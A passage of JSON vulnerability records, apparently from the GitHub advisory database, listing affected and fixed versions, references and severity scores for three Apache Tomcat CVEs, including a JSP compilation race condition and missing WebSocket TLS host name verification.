"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.23" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.23" }, { 
"fixed": "9.0.106" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49124" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/28726cc2e63bed68771f5eb0f65a78dc7080571823" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c56456cda8151c9504dfb7985700824559d769a7" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e0e07812224d327a321babb554f5a5758d30cc49" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/lnow7tt2j6hb9kcpkggx32ht6o90vqzv" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.42" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.8" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.106" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/06/16/3" } ], "database_specific": { "cwe_ids": [ "CWE-426" ], "github_reviewed": true, "github_reviewed_at": 
"2025-10-29T16:05:26Z", "nvd_published_at": "2025-06-16T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-46j3-r4pj-4835", "published": "2018-10-17T16:32:43Z", "modified": "2024-10-21T19:23:25.912196Z", "aliases": [ "CVE-2018-8034" ], "summary": "The host name verification missing in Apache Tomcat", "details": "The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.10" } ] } ], "versions": [ "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.32" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } }, { "package": { "name": 
"org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.53" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.35" }, { "fixed": "7.0.90" } ] } ], "versions": [ "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.88", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8034" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2c522795166c930741a9cecca76797bf48cb1634" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/2835bb4e030c1c741ed0847bb3b9c3822e4fbc8a" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00047.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180817-0001" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3723-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102810/http://www.securityfocus.com/bid/104895" }, { "type": "WEB", "url": "https://web.archive.org/web/20200517032514/http://www.securitytracker.com/id/1041374" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0130" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0131" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:0450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1162" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722091057.GA70283%40minotaur.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722091057.GA70283@minotaur.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/104895" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041374" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": 
"2020-06-16T20:57:40Z", "nvd_published_at": "2018-08-01T18:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5j33-cvvr-w245", "published": "2024-12-17T15:31:43Z", "modified": "2025-11-03T22:00:31.720080Z", "aliases": [ "BIT-tomcat-2024-50379", "CVE-2024-50379" ], "related": [ "CGA-5749-245m-24vg" ], "summary": "Apache Tomcat Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability", "details": "Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration).\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", 
"ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", 
"9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", 